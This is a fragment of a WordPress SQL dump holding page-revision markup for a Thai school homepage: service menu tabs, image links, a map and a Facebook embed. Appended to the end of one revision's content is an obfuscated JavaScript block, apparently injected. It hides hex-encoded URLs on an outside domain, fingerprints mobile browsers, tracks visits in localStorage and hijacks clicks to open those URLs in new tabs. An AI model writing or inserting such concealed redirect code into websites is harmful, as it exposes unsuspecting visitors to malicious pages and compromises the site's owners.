{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 22:05:34','2024-08-09 15:05:34','',14,'http://pakhaeng.ssk.in.th/?p=813',0,'revision','',0),
(814,1,'2024-08-09 22:08:40','2024-08-09 15:08:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container 